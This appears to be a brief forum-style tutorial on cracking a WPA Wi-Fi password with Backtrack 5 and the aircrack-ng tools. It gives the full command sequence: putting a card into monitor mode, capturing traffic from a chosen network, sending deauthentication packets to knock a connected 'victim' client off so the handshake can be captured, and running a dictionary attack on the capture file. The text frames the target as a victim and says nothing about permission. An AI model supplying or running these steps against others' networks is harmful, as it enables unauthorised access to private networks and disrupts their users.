Tools :
1- Backtrack5
2- Wireless Card (if you have a laptop) or a Wi-Fi USB KEY
3- Dictionary (Wordlist : a files*.txt contain more than 1.000.000.000 words)
STEPS:
1- Open a terminal : airmon-ng
2- airmon-ng start wlan0
3- airodump-ng mon0
5- airodump-ng -w capture --bssid (bssid) -c (channel) mon0
6- aireplay-ng --deauth 1 -a (bssid) -c (client mac) mon0
NOTE: -w capture: a file called capture-01.cap will be created in the document root.
To get a handshake, your victim must be connected.
Without the handshake you can not crack the password !
7- aircrack-ng capture-01.cap -w (wordlist file location)
8- Waiting until aircrack-ng find the correct password